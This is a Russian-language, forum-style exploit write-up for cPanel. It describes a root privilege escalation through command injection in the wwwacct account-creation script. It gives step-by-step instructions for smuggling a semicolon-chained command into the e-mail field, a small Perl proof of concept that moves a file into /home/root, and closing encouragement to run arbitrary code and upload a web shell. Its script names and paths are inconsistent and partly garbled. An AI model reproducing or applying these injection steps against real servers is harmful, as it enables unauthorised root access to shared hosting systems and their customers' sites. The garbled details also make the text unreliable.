Cpanel

Версия: все

риск: очень высокий

Этот баг может привести к поднятию привелегий до рута

Cpanel самоя распространенная у хостеров предоставляющие площадки под сайт

официальный сайт: Cpanel.net

[code]

Как это работает?

Что происходит когда ты создаёш аккаунт ?

./script/wwwact [domainname] [username] [password] [Email address] lab lab lab

Далее ты можеш запусьтить саму программу ! ( cpanel : doamin:2086)

К примеру:

http://domain:2086/scripts/wwwacct [domainname] [username] [password] [Email address] lab lab lab

iЕсли запрос прошол значит у вас есть доступ к деректории скрипта (Th3 r00t)

так ты можеш выполнять любые команды, к примеру

./scripts/wwwactt domain.com domain password (at) (dot) ir [email concealed];./home/public_html/do.pl ( your command now is ./home/hackerz/public_html/do.pl)


()()()()()()()()()()()()()

Проверим:

++++++++++++++++++++++++++

Шаг первый

сохроните в фаил /home/user/public_html/do.pl .

#!/usr/bin/perl

$old='/home/user/public_html/test.txt';

$new='/home/root/kon.txt';

rename $old, $new;

++++++++++++++++++++++++++

Шаг второй

пазовите фаил test.txt в твоей public_html директории.

path will be : /home/user/public_html/test.txt .

++++++++++++++++++++++++++

Шаг третий

создайте аккаунт с следушей командой: (at) (dot) ir [email concealed];./home/user/public_html/do.pl in E-mail Address text box

и нажмите нопку создать.

Теперь ты сможеш видеть /home/root/ .

++++++++++++++++++++++++++

()()()()()()()()()()()()()

Ты можеш выполнить и ваш собственный код !Залить шелл и тп.